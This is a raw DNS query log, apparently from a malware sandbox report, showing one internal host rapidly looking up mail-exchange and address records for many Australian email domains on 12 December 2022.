                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.842143059 CET192.168.2.38.8.8.80xcce6Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.864783049 CET192.168.2.38.8.8.80x4752Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.938020945 CET192.168.2.38.8.8.80x9199Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.958839893 CET192.168.2.38.8.8.80x6fccStandard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.003834963 CET192.168.2.38.8.8.80x4649Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.027060986 CET192.168.2.38.8.8.80xf996Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.101732016 CET192.168.2.38.8.8.80xf81bStandard query (0)asav2.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.154664993 CET192.168.2.38.8.8.80x3fd5Standard query (0)abs.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.179153919 CET192.168.2.38.8.8.80x98fcStandard query (0)mail.abs.gov.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.208024979 CET192.168.2.38.8.8.80xf07dStandard query (0)tpg.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.227108955 CET192.168.2.38.8.8.80xc17aStandard query (0)asav.tpg.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.283340931 CET192.168.2.38.8.8.80xb35eStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.311273098 CET192.168.2.38.8.8.80x7cf5Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.379070997 CET192.168.2.38.8.8.80xe370Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.415800095 CET192.168.2.38.8.8.80x1542Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.477039099 CET192.168.2.38.8.8.80xb56cStandard query (0)ad2-one.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.551033974 CET192.168.2.38.8.8.80xbaa4Standard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.573404074 CET192.168.2.38.8.8.80x37aStandard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.624938965 CET192.168.2.38.8.8.80x8702Standard query (0)stmyalt.melb.catholic.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.736167908 CET192.168.2.38.8.8.80x9d2dStandard query (0)mbox.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.815540075 CET192.168.2.38.8.8.80x8769Standard query (0)schoolboost.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.879127026 CET192.168.2.38.8.8.80xa761Standard query (0)three.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.900960922 CET192.168.2.38.8.8.80xc7aStandard query (0)smtpin2.three.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.936045885 CET192.168.2.38.8.8.80xec7eStandard query (0)netspace.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.954898119 CET192.168.2.38.8.8.80x8fa8Standard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.024148941 CET192.168.2.38.8.8.80xb5eaStandard query (0)ehtravel.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.031382084 CET192.168.2.38.8.8.80xac92Standard query (0)mx3.email-hosting.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.033066988 CET192.168.2.38.8.8.80x137eStandard query (0)mx2.fusemail.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.170166016 CET192.168.2.38.8.8.80xfbd4Standard query (0)emmconsult.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.277188063 CET192.168.2.38.8.8.80x25cfStandard query (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.302095890 CET192.168.2.38.8.8.80xa368Standard query (0)asav2.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.332187891 CET192.168.2.38.8.8.80x6a81Standard query (0)d501078.b.ess.au.barracudanetworks.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.344697952 CET192.168.2.38.8.8.80xe32bStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.366117954 CET192.168.2.38.8.8.80xc3faStandard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.460247040 CET192.168.2.38.8.8.80xa9efStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.479537964 CET192.168.2.38.8.8.80xff78Standard query (0)emmconsult.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.479583025 CET192.168.2.38.8.8.80x1c23Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.522933006 CET192.168.2.38.8.8.80x874dStandard query (0)jaevans.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.582693100 CET192.168.2.38.8.8.80xccedStandard query (0)jaevans-com-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.594329119 CET192.168.2.38.8.8.80x6e8cStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.614633083 CET192.168.2.38.8.8.80x477bStandard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.679157019 CET192.168.2.38.8.8.80xbfb0Standard query (0)candlelightproductions.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.770534992 CET192.168.2.38.8.8.80x4d43Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.801383018 CET192.168.2.38.8.8.80xc1c9Standard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.830286980 CET192.168.2.38.8.8.80x356eStandard query (0)swiftdsl.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.854249954 CET192.168.2.38.8.8.80x9fe3Standard query (0)ipt-mailgate-01.m2core.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.893162012 CET192.168.2.38.8.8.80x5a1fStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.929764032 CET192.168.2.38.8.8.80x2277Standard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.984234095 CET192.168.2.38.8.8.80x75cStandard query (0)cos.tas.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.047260046 CET192.168.2.38.8.8.80x4109Standard query (0)cgs.act.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.143241882 CET192.168.2.38.8.8.80x4714Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.161433935 CET192.168.2.38.8.8.80xb339Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.252856016 CET192.168.2.38.8.8.80xad5bStandard query (0)ozemail.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.333261967 CET192.168.2.38.8.8.80x7fe3Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.354440928 CET192.168.2.38.8.8.80xd704Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.417692900 CET192.168.2.38.8.8.80xfea6Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.439416885 CET192.168.2.38.8.8.80xed6dStandard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.480403900 CET192.168.2.38.8.8.80x595aStandard query (0)cgs-act-edu-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.507158041 CET192.168.2.38.8.8.80x2e6dStandard query (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.596373081 CET192.168.2.38.8.8.80xdea2Standard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.605139971 CET192.168.2.38.8.8.80xffafStandard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.618952036 CET192.168.2.38.8.8.80x9dbStandard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.687973976 CET192.168.2.38.8.8.80x3ca7Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.706367016 CET192.168.2.38.8.8.80xc131Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.770559072 CET192.168.2.38.8.8.80x6fe4Standard query (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.791775942 CET192.168.2.38.8.8.80xd667Standard query (0)asav2.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.817487955 CET192.168.2.38.8.8.80x6737Standard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.863679886 CET192.168.2.38.8.8.80x1384Standard query (0)multiculturalarts.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.950787067 CET192.168.2.38.8.8.80xbf95Standard query (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.970238924 CET192.168.2.38.8.8.80x1079Standard query (0)extmail.bpbb.bigpond.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.032555103 CET192.168.2.38.8.8.80x2aStandard query (0)stonedesign.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.234265089 CET192.168.2.38.8.8.80xe1dbStandard query (0)filter2.multic-2.mailguard.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.234863997 CET192.168.2.38.8.8.80x4021Standard query (0)adam.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.244163036 CET192.168.2.38.8.8.80xaad3Standard query (0)d505367.a.ess.au.barracudanetworks.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.254254103 CET192.168.2.38.8.8.80x7783Standard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.311882019 CET192.168.2.38.8.8.80x7fe9Standard query (0)student.ecu.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.386599064 CET192.168.2.38.8.8.80x5e63Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.407084942 CET192.168.2.38.8.8.80xbeacStandard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.455137014 CET192.168.2.38.8.8.80x4b5aStandard query (0)cba.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.476418018 CET192.168.2.38.8.8.80x1b00Standard query (0)cba-com-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.543987036 CET192.168.2.38.8.8.80xe79fStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.562252998 CET192.168.2.38.8.8.80x4959Standard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.633150101 CET192.168.2.38.8.8.80x4d99Standard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.664750099 CET192.168.2.38.8.8.80x2c8aStandard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.716021061 CET192.168.2.38.8.8.80x781eStandard query (0)student-ecu-edu-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.721456051 CET192.168.2.38.8.8.80x8487Standard query (0)web.deMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.747392893 CET192.168.2.38.8.8.80xdbf5Standard query (0)mx-ha03.web.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.837905884 CET192.168.2.38.8.8.80xe042Standard query (0)ruzicka.id.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.928853989 CET192.168.2.38.8.8.80x8692Standard query (0)whiteminx.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.035387993 CET192.168.2.38.8.8.80x8db0Standard query (0)ompac.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.093516111 CET192.168.2.38.8.8.80x950fStandard query (0)aapt.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.112715960 CET192.168.2.38.8.8.80x587cStandard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.119278908 CET192.168.2.38.8.8.80x6d26Standard query (0)alt1.aspmx.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.214716911 CET192.168.2.38.8.8.80x1ae5Standard query (0)ozemail.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.232947111 CET192.168.2.38.8.8.80x95beStandard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.301522017 CET192.168.2.38.8.8.80xd607Standard query (0)cap.tas.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.379803896 CET192.168.2.38.8.8.80xb45Standard query (0)tpg.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.398118019 CET192.168.2.38.8.8.80xe2dfStandard query (0)asav.tpg.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.504273891 CET192.168.2.38.8.8.80xd158Standard query (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.507831097 CET192.168.2.38.8.8.80x2fbdStandard query (0)asav.tpg.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.523335934 CET192.168.2.38.8.8.80x5219Standard query (0)extmail.bpbb.bigpond.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.546681881 CET192.168.2.38.8.8.80xac82Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.567399025 CET192.168.2.38.8.8.80x7530Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.628951073 CET192.168.2.38.8.8.80x7cb5Standard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.662930012 CET192.168.2.38.8.8.80x2e1bStandard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.726381063 CET192.168.2.38.8.8.80xd9d9Standard query (0)starnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.818577051 CET192.168.2.38.8.8.80xa435Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.839518070 CET192.168.2.38.8.8.80x4defStandard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.911359072 CET192.168.2.38.8.8.80xe57dStandard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.930530071 CET192.168.2.38.8.8.80x8309Standard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.983952045 CET192.168.2.38.8.8.80x43ecStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.002510071 CET192.168.2.38.8.8.80x8585Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.103075981 CET192.168.2.38.8.8.80x3fc7Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.127407074 CET192.168.2.38.8.8.80xaa3dStandard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.175553083 CET192.168.2.38.8.8.80xd7bbStandard query (0)hn.ozemail.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.193584919 CET192.168.2.38.8.8.80x9486Standard query (0)cusdomain.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.271111965 CET192.168.2.38.8.8.80x1aeeStandard query (0)aapt.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.307816029 CET192.168.2.38.8.8.80x96c4Standard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.316056967 CET192.168.2.38.8.8.80xe0d7Standard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.337584019 CET192.168.2.38.8.8.80x6fe4Standard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.425225973 CET192.168.2.38.8.8.80x7ea9Standard query (0)eq.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.443948984 CET192.168.2.38.8.8.80x2107Standard query (0)eq-edu-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.549360037 CET192.168.2.38.8.8.80x425eStandard query (0)fastmail.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.550435066 CET192.168.2.38.8.8.80x4b3bStandard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.625325918 CET192.168.2.38.8.8.80x615fStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.645569086 CET192.168.2.38.8.8.80x4010Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.721417904 CET192.168.2.38.8.8.80x50aeStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.740377903 CET192.168.2.38.8.8.80xdc9eStandard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.770128965 CET192.168.2.38.8.8.80x422bStandard query (0)in1-smtp.messagingengine.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.802567005 CET192.168.2.38.8.8.80xfcb8Standard query (0)optushome.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.823085070 CET192.168.2.38.8.8.80xfe95Standard query (0)mail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.873862028 CET192.168.2.38.8.8.80x61adStandard query (0)aapt.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.942425966 CET192.168.2.38.8.8.80x9d63Standard query (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.963936090 CET192.168.2.38.8.8.80xbc20Standard query (0)extmail.bpbb.bigpond.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.023601055 CET192.168.2.38.8.8.80x762fStandard query (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.094459057 CET192.168.2.38.8.8.80x3c21Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.115556955 CET192.168.2.38.8.8.80x4ba4Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.190030098 CET192.168.2.38.8.8.80x5e90Standard query (0)bigpond.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.244338989 CET192.168.2.38.8.8.80xb8a1Standard query (0)extmail.bigpond.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.246916056 CET192.168.2.38.8.8.80xc265Standard query (0)asav.tpgtelecom.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.271332979 CET192.168.2.38.8.8.80x88efStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.291271925 CET192.168.2.38.8.8.80xc10cStandard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.350496054 CET192.168.2.38.8.8.80xd9f3Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.371268988 CET192.168.2.38.8.8.80x23a4Standard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.458657980 CET192.168.2.38.8.8.80x3e4fStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.477582932 CET192.168.2.38.8.8.80xb328Standard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.611413002 CET192.168.2.38.8.8.80xcef9Standard query (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.644279957 CET192.168.2.38.8.8.80xeca4Standard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.674135923 CET192.168.2.38.8.8.80x451Standard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.694443941 CET192.168.2.38.8.8.80x57acStandard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.783766985 CET192.168.2.38.8.8.80x6000Standard query (0)alphawest.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.851598024 CET192.168.2.38.8.8.80x6b9eStandard query (0)boomtick.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.901340961 CET192.168.2.38.8.8.80xb1aaStandard query (0)m-obemv-vic-sun-mta01.alphawest.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.925903082 CET192.168.2.38.8.8.80x46d8Standard query (0)figdor.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.021786928 CET192.168.2.38.8.8.80xb588Standard query (0)vantex.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.058190107 CET192.168.2.38.8.8.80xbabfStandard query (0)boomtick.com.au.inbound.anz.mpmailmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.094820023 CET192.168.2.38.8.8.80xf296Standard query (0)iinet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.193519115 CET192.168.2.38.8.8.80xb602Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.214715004 CET192.168.2.38.8.8.80x54c4Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.275394917 CET192.168.2.38.8.8.80x73a4Standard query (0)alt1.aspmx.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.300754070 CET192.168.2.38.8.8.80xc1f4Standard query (0)studentflights.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.409104109 CET192.168.2.38.8.8.80x1f2dStandard query (0)mlcsyd.nsw.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.433768034 CET192.168.2.38.8.8.80xb0b0Standard query (0)mlcsyd-nsw-edu-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.452702999 CET192.168.2.38.8.8.80x58d1Standard query (0)au-smtp-inbound-1.mimecast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.456551075 CET192.168.2.38.8.8.80x6ca8Standard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
